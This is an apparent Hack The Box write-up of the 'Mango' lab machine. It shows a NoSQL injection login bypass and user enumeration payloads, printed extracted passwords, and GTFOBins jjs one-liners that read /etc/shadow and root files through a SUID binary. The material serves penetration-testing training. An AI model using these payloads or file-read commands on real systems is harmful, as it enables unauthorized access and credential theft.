[HTB] Mango — Write-up (OSWE-Prep)

Mango was a medium difficulty Linux box. Good learning path for:

Initial Recon

Nmap

# nmap -Pn — open -sC -sV -p- -T4 10.10.10.162PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
| http/1.1
| http/1.1
...[snip]...
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Except for “Analytics,” all other links are non- functional. On the “Analytics” page, there were some cool looking chart as well as other functions. However, this was a rabbit hole and did not get me anything to exploit.

Next, I inspected the certificate and found additional domain staging-order.mango.htb under the Common Name (CN) section.

By adding this domain into /etc/hosts file, we can not hit the delicious looking login page.

Updating /etc/hosts
staging-order.mango.htb

Initial Foothold

MongoDB + NoSQL

I did some directory brute-forcing and some of the basic SQLi attacks against the login; however, nothing came back with good news.

My next thought process was to guess things as HTB likes to name the box as a hint. Mango sounds similar to MongoDB, so I did some google search about MongoDB exploit. And I came across an old MMACTF 2016 write-up about MongoDB — Extracting data (admin password) using NoSQL Injection. This was basically talking about leveraging a NoSQL injection technique to bypass the authentication scheme to enumerate users and the passwords associated with them. Sounds juicy like mango :)

NoSQL Injection Attack

First thing first, I wanted to confirm if the login and the whatever back-end DB (although I was very much convinced that it would be MongoDB) is vulnerable to NoSQL injection attack. I used some example PoC from a CTF write-up as well as PayloadsAllTheThings Github.

Example PoC of NoSQL Injection Exploit (Source: PayloadsAllTheThings)

(1) Benign Login Attempt

I captured the login request providing with arbitrary login admin : admin and the response came back with “200 OK” which redirected me to the same login page.

(2) NoSQL Injection Attack to Bypass Authentication

When running the following payload, I got “302 Found” redirection response.

username[$ne]=admin&password[$ne]=admin&login=login

When I followed the redirection, I now successfully bypass the authentication to view the /home.php page.

It was just a static error page saying “Under Plantation” and nothing I could do anything with it. But what we can do further with NoSQL attack against databases is that we could dump credentials from the databases.

NoSQL Injection Attack — User Enumeration

From the error page, I knew that the user “admin” was valid. We can quickly confirm this by doing the following:

### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found
### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK

Knowing this, I used Burp Intruder with rockyou.txt wordlist to enumerate more valid users from the databases:

NoSQL Injection Attack — Extracting Passwords

Next, I modified the PoC script from the CTF write-up to extract the passwords from the SQL database. This exploit script can be also found here.

exploit.py

Password found for “admin” user: t9KcS3>!0B#2

The password found for “mango” user: h3mXK8RhU~f{]f5H

I SSHed into the box using the mango's credentials.

However, “mango” user does not have permission to read the user.txt flag.

Privilege Escalation

mango → admin

user.txt

Escalating to user admin from mango was pretty simple. I used su admin command and its password to login in as admin user. I could also read the user.txt flag.

admin → Root (GTFobins Exploit)

For the privilege escalation, I ran the LinEnum.sh script to quickly cover the basis. And it found the following interesting SUID file:

What was interesting about this file was that its ownership was set to root; however, its group-owner was set to the admin user so that he could run this binary under the context of the root user.

GTFobins — JJS Exploit

From a quick search in GTFobins site, I was able to find a PoC script to exploit this jjs program.

The script was pretty self-explanatory, and using this, one could read any files as root permission.

### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

root.txt

### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Conclusion

This was really good box to learn about NoSQL Injection attack. And writing an exploit script to dump the passwords from the SQL database was really fun too.

Thanks for reading!

Thanks to TJ_NULL for providing the list for the OSWE-like VMs

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security